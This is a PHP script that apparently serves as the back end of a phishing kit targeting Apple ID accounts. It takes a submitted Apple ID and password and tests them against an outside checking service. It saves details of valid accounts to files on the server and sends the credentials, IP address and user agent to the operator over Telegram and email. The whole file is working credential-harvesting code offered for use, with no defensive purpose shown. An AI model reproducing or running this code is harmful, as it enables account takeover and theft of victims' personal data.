<?php  
    include("../config/config.php");  
    include("plugins.php"); 
    
    $user_ip = getUserIP();
    
    $email= $_GET['user'];
    $pass= $_GET['pass'];
    $agent = $_SERVER['HTTP_USER_AGENT'];
    
    $userid = $_GET['user'];
  
 
    $idapp = $_GET["idapp"];
    
    $x_sscon = "";
    
    $timeZone = 'America/Lima';
    date_default_timezone_set($timeZone); 
  
    $fechas_tt=date('Y-m-d H:i:s');
 	$datee = new DateTime($fechas_tt);
	
    $hora_s =date_format($datee, 'h'); 
    $min_s =date_format($datee, 'i'); 
	
    $dia_s =date_format($datee, 'd'); 
    $mes_s =date_format($datee, 'm');
    $mes_y =date_format($datee, 'Y');
	            
	            
    $hora = $hora_s.':'.$min_s;
    $fecha = $dia_s.'/'.$mes_s.'/'.$mes_y;  
    
    
                            $post = 'username='.trim($email).'&password='.trim($pass);
                            $ch = curl_init('https://icloud-XXXXX.com/XXXXer/auto/?username='.$email.'&password='.$pass); 
                            curl_setopt($ch,CURLOPT_FAILONERROR,0);
                            curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2) AppleWebkit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6');
                            curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
                            curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
                            $verify = curl_exec($ch);
                            curl_close($ch);  
    
                                $findme   = '<span ';
                                $pos = strpos($verify, $findme); 
                
                                $find   = 'No Devices linked';
                                $res_dos = strpos($verify, $find); 
                
                                $asunto = "";
                                $asunto_t = "";
                                
                                if($pos !== false || $res_dos !== false){
                                      $asunto = "CLAVE CORRECTA LOGIN Game";  
                                      $asunto_t = "CORRECTOS";
                                      $x_sscon = 'es_0'; 
                                }else{ 
                                      $asunto = "CLAVE INCORRECTA LOGIN Game "; 
                                      $asunto_t = "INCORRECTO";
                                      $x_sscon = 'es_1'; 
                                } 
                                
                                
                                
                                $host= $_SERVER["HTTP_HOST"]; 
                
                                 $url = " sin link";
            
                                   if($asunto_t == "CORRECTOS"){
                                    
                                        $nombre_archivo = "../very/".encode($email).".txt"; 
                                     
                                        if(file_exists($nombre_archivo))
                                        {
                                            //$mensaje = "El Archivo $nombre_archivo se ha modificado";
                                        }
                                     
                                        else
                                        {
                                            //$mensaje = "El Archivo $nombre_archivo se ha creado";
                                        }
                                     
                                        if($archivo = fopen($nombre_archivo, "w"))
                                        {
                                            fwrite($archivo, $verify);
                                     
                                            fclose($archivo);
                                        }
                                    $url = "http://".$host."/very/". encode($email);
                                }
                                 
                                  
                                    $text_t = "Login: Game \nIdentificador: ".$idapp." \nFecha: ".$fecha."-".$hora."\nDatos: ".$asunto_t."\nAppleID: ".$email."\nClave: ".$pass." \ninfo:".$url;
                                    
                                    send_telegram($TOKKEN,$CHAT_ID,$text_t); 
                                    send_mail($asunto,$GLOBAL_MAIL,$idapp,$email,$pass,'','',$user_ip,$agent, $verify); 
            
            
            
             
   
     

    if(isset($_GET['name']) && isset($_GET['callback']))
    {
        $obj->name = $_GET['name'];
        $obj->message = $x_sscon;
         
        echo $_GET['callback']. '(' . json_encode($obj) . ');';
    }


?>
